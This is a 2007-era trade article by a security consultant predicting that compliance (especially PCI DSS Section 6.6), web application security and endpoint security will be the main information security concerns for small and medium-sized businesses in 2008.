There will be three key information security issues for small and medium-sized businesses (SMBs) in 2008: compliance, application/website security and endpoint security. These three areas will be much more tightly intertwined next year than they were in 2007.
Getting in compliance
SMBs, particularly private companies, may think government regulations are only for publicly traded, usually larger, companies. But that's not always the case. For SMBs servicing public companies, regulators and auditors looking downstream will knock on their doors, too. Compliance with the Sarbanes-Oxley Act (SOX) for public companies, the Health Insurance Portability and Accountability Act (HIPAA) for health care providers, and the Payment Card Industry Data Security Standard (PCI DSS) for companies accepting credit card payments will continue to nag SMBs, just as they do their larger corporate brethren.
What are the big components of compliance? Access management and application and network systems security are all part of the mix. They can't be separated and treated as individual pieces. To be compliant, an SMB will have to satisfy all of these requirements.
Each regulation has its unique twist. While compliance with SOX and HIPAA will continue to be an issue, the red flag for SMBs in 2008 will be PCI DSS. Unlike SOX and HIPAA, which are government regulations, PCI is an industry standard governed by a consortium of the five largest credit card companies -- Visa International, MasterCard International Inc., American Express Co., Discover Financial Services LLC and JCB Co. Companies found not in compliance can be fined or barred from processing cards through consortium members.
Although many parts of PCI DSS affect SMBs directly, the particular pain point in 2008 will be Section 6.6, which governs application security. This section, which is currently just a recommendation, will be elevated to a requirement in June.
Securing applications and websites
Section 6.6 requires all Web-facing applications to be protected from known attacks by one of two methods, both of which could be costly for an SMB. The first method is to have all custom application code reviewed for common vulnerabilities by an organization specializing in application security. The other way is to simply install an application-level firewall around Web applications. The first is costly in terms of staff, the second in terms of money.
But there are indications the PCI council can live without full-blown reviews of every line of Web application code. Popular Web scanning tools within reach of SMBs, such as WebInspect from SPI Dynamics Inc. and AppScan from Watchfire Corp., may be adequate. Even though these tools don't review application code, they can uncover common vulnerabilities in websites and applications. If an SMB can demonstrate that it can remediate the vulnerabilities uncovered by these scans, it could pass muster without hiring yet another expensive consultant to review hundreds of thousands of lines of code.
Access management also falls under the compliance umbrella, not only for PCI DSS, but for SOX and HIPAA, too. All of these regulations are sticklers for complete records of who has access to systems, including proof of regular pruning of inactive accounts. This requires the ability to assemble reports at regular intervals that are available for auditors and regulators on demand. For cash-strapped SMBs, the built-in reporting tools in Active Directory, a popular access management system, are adequate for compliance.
Endpoint security to the fore
With the proliferation of remote workers, laptop-toting road warriors and managers with BlackBerrys, endpoint security has become critical for SMBs. This is in addition to the use of USB keys and other pocket-sized portable storage devices that carry presentations and other data for off-site work. All these devices are big cost savers for SMBs, since they reduce the need for expensive office space by allowing employees to work remotely.
But that freedom also comes with serious risks to network security. These devices, if not properly configured, can connect directly to the network, basically circumventing traditional firewalls. They can both bring malware into the network and take sensitive information or customer data out of the network.For SMBs servicing public companies, regulators and auditors looking downstream will knock on their doors, too.
Besides properly configuring remote devices to access the network only through a firewall or dedicated gateway, devices need to be checked to make sure they have been sufficiently hardened and are free of malware. In other words, they should be allowed to connect to the network only if their patches and antivirus software are up to date. As for USB keys and other external storage devices, they should be restricted to users who need them for business purposes, or blocked from the enterprise network altogether.
SMB-friendly products in the endpoint security market include Safend Protector from Safend Ltd. and DeviceWall from Centennial Software Ltd. Both products are easy to install and have easy-to-use Web-based interfaces for monitoring and controlling endpoints and devices on the network.
Guard your sites
Web and application security will continue to be a concern for SMBs in 2008. Hackers will continue, as they did in 2007, to go downscale and target smaller companies, which they believe have weaker defenses than larger enterprises with better-staffed security departments. SMBs' websites are just as susceptible to attacks as websites of larger companies through cross-site scripting, SQL injection and session hijacking.
The best defense against Web attacks is to follow safe coding practices, as outlined by the Open Web Application Security Project (OWASP). Following OWASP, the industry standard for Web security, is also required for PCI DSS compliance. Here again, compliance comes up as part of a separate issue, in this case, application security. In addition to safe coding practices, OWASP outlines best practices for secure Web design, such as Web server configuration.
While 2008 will prove to be another difficult year with plenty of information security issues for SMBs, the challenges won't be insurmountable.
Joel Dubin, CISSP, is an independent computer security consultant. He is a Microsoft MVP, specializing in Web and application security, and is the author of The Little Black Book of Computer Security, available from Amazon.com. He has a regular radio show on computer security on WIIT in Chicago and runs The IT Security Guy blog at www.theitsecurityguy.com.